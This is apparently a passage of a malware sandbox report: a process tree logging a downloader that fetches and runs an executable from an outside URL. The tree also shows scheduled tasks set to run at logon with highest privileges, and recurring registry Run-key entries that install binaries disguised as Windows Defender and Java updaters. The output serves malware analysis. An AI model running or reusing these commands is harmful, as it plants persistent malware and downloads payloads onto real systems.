      "C:\Users\Admin\AppData\Local\Temp\Files\WEBDOWN.EXE" http://www.ojang.pe.kr/CALENDAR/DOWN/JEDITOR/JEDITOR.EXE "C:/Users/Admin/AppData/Local/Temp/Files/jeditor.exe" RUN
      4⤵
      Downloads MZ/PE file
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2868
    - - C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
        
        C:\Users\Admin\AppData\Local\Temp\Files\jeditor.exe
        5⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1140
- - C:\Users\Admin\AppData\Local\Temp\Files\temp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\temp.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1860
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "roIrMC" /tr '"C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"' & exit
      4⤵
      System Location Discovery: System Language Discovery
      PID:2156
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "roIrMC" /tr '"C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"'
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp757E.tmp.bat""
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:776
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2372
    - - C:\Users\Admin\AppData\Local\Temp\roIrMC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\roIrMC.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2316
- - C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2780
- - C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
    3⤵
    - Executes dropped EXE
    PID:2768
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D53A.tmp\D53B.tmp\D53C.bat C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe"
      4⤵
      Loads dropped DLL
      Drops file in System32 directory
      PID:2084
    - - C:\Windows\system32\timeout.exe
        
        timeout 1
        5⤵
        
        PID:2904
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        5⤵
        
        PID:1356
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        5⤵
        Adds Run key to start application
        
        PID:1636
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        5⤵
        
        PID:2892
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        5⤵
        
        PID:2372
    - - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        5⤵
        Executes dropped EXE
        
        PID:776
      - C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:756
    - - C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1412
      - C:\Windows\system32\schtasks.exe
        
        "schtasks" /create /tn "WindowsDataUpdater" /sc ONLOGON /tr "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1324
    - - C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        5⤵
        Executes dropped EXE
        
        PID:1048
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D855.tmp\D856.tmp\D857.bat C:\Windows\system32\java.exe"
        6⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:2348
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        7⤵
        
        PID:316
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        7⤵
        
        PID:2484
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        7⤵
        
        PID:1900
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        7⤵
        
        PID:2864
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        7⤵
        
        PID:2908
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        7⤵
        Executes dropped EXE
        
        PID:2244
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1700
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:688
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        7⤵
        Executes dropped EXE
        
        PID:1416
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DBFD.tmp\DBFE.tmp\DBFF.bat C:\Windows\system32\java.exe"
        8⤵
        Loads dropped DLL
        
        PID:2268
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        9⤵
        
        PID:1356
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        9⤵
        
        PID:1976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        9⤵
        
        PID:2808
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        9⤵
        
        PID:1948
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        9⤵
        Adds Run key to start application
        
        PID:1500
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        9⤵
        Executes dropped EXE
        
        PID:2028
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2660
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        9⤵
        Executes dropped EXE
        
        PID:2216
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DFA5.tmp\DFA6.tmp\DFA7.bat C:\Windows\system32\java.exe"
        10⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:1504
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        11⤵
        Delays execution with timeout.exe
        
        PID:2800
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        11⤵
        
        PID:1760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        11⤵
        
        PID:1652
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        11⤵
        
        PID:3060
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        11⤵
        
        PID:1944
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        11⤵
        Executes dropped EXE
        
        PID:2372
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        12⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2924
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        11⤵
        Executes dropped EXE
        
        PID:2932
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E3AB.tmp\E3AC.tmp\E3AD.bat C:\Windows\system32\java.exe"
        12⤵
        Loads dropped DLL
        Drops file in System32 directory
        
        PID:1572
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        13⤵
        Delays execution with timeout.exe
        
        PID:1984
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        13⤵
        Adds Run key to start application
        
        PID:1268
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        13⤵
        
        PID:1544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        13⤵
        
        PID:2544
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        13⤵
        
        PID:1532
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        13⤵
        Executes dropped EXE
        
        PID:2092
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        14⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2284
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        13⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1052
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        13⤵
        Executes dropped EXE
        
        PID:2480
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E782.tmp\E783.tmp\E784.bat C:\Windows\system32\java.exe"
        14⤵
        Loads dropped DLL
        
        PID:764
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        15⤵
        
        PID:2468
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        15⤵
        Adds Run key to start application
        
        PID:2020
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        15⤵
        
        PID:988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        15⤵
        Adds Run key to start application
        
        PID:2504
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        15⤵
        
        PID:1788
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        15⤵
        Executes dropped EXE
        
        PID:2132
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        16⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1500
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        15⤵
        Executes dropped EXE
        
        PID:1852
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EB58.tmp\EB59.tmp\EB5A.bat C:\Windows\system32\java.exe"
        16⤵
        Drops file in System32 directory
        
        PID:2332
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        17⤵
        
        PID:1672
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        17⤵
        
        PID:1528
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        17⤵
        
        PID:392
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        17⤵
        
        PID:808
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        17⤵
        
        PID:1624
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        17⤵
        Executes dropped EXE
        
        PID:1900
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        18⤵
        Executes dropped EXE
        
        PID:2452
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        17⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1772
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        17⤵
        Executes dropped EXE
        
        PID:1432
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EF10.tmp\EF11.tmp\EF12.bat C:\Windows\system32\java.exe"
        18⤵
        Drops file in System32 directory
        
        PID:952
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        19⤵
        
        PID:928
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        19⤵
        
        PID:2904
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        19⤵
        
        PID:2160
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        19⤵
        
        PID:1980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        19⤵
        Adds Run key to start application
        
        PID:2784
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        19⤵
        Executes dropped EXE
        
        PID:472
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        20⤵
        Executes dropped EXE
        
        PID:1532
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        19⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        19⤵
        Executes dropped EXE
        
        PID:1536
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F316.tmp\F317.tmp\F327.bat C:\Windows\system32\java.exe"
        20⤵
        Drops file in System32 directory
        
        PID:1512
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        21⤵
        Delays execution with timeout.exe
        
        PID:2692
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        21⤵
        
        PID:924
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        21⤵
        Adds Run key to start application
        
        PID:1684
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        21⤵
        
        PID:2696
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        21⤵
        
        PID:2748
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        21⤵
        Executes dropped EXE
        
        PID:1760
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        22⤵
        Executes dropped EXE
        
        PID:2020
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        21⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2232
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        21⤵
        Executes dropped EXE
        
        PID:2308
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F71B.tmp\F71C.tmp\F71D.bat C:\Windows\system32\java.exe"
        22⤵
        Drops file in System32 directory
        
        PID:1936
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        23⤵
        
        PID:2012
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        23⤵
        
        PID:908
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        23⤵
        
        PID:2880
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        23⤵
        
        PID:2572
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        23⤵
        
        PID:2692
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        23⤵
        Executes dropped EXE
        
        PID:924
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        24⤵
        Executes dropped EXE
        
        PID:1960
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        23⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        23⤵
        Executes dropped EXE
        
        PID:2696
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAD3.tmp\FAD4.tmp\FAD5.bat C:\Windows\system32\java.exe"
        24⤵
        Drops file in System32 directory
        
        PID:1864
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        25⤵
        
        PID:1228
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        25⤵
        
        PID:2524
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        25⤵
        
        PID:316
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        25⤵
        Adds Run key to start application
        
        PID:2676
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        25⤵
        
        PID:2616
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        25⤵
        Executes dropped EXE
        
        PID:1268
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        26⤵
        Executes dropped EXE
        
        PID:2500
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        25⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        25⤵
        Executes dropped EXE
        
        PID:1680
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FEE8.tmp\FEE9.tmp\FEEA.bat C:\Windows\system32\java.exe"
        26⤵
        Drops file in System32 directory
        
        PID:2804
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        27⤵
        Delays execution with timeout.exe
        
        PID:2584
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        27⤵
        
        PID:2016
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        27⤵
        
        PID:1480
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        27⤵
        
        PID:2576
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        27⤵
        Adds Run key to start application
        
        PID:2608
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        27⤵
        
        PID:2412
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        28⤵
        
        PID:2840
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        27⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:932
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        27⤵
        
        PID:3012
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2AF.tmp\2B0.tmp\2B1.bat C:\Windows\system32\java.exe"
        28⤵
        Drops file in System32 directory
        
        PID:808
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        29⤵
        
        PID:2496
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        29⤵
        
        PID:2800
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        29⤵
        Adds Run key to start application
        
        PID:392
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        29⤵
        
        PID:2940
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        29⤵
        
        PID:1840
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        29⤵
        
        PID:1860
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        30⤵
        
        PID:2612
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        29⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        29⤵
        
        PID:1672
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\732.tmp\733.tmp\734.bat C:\Windows\system32\java.exe"
        30⤵
        Drops file in System32 directory
        
        PID:2616
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        31⤵
        Delays execution with timeout.exe
        
        PID:2480
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        31⤵
        
        PID:348
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        31⤵
        
        PID:1560
        
        C:\Windows\system32\reg.exe
        
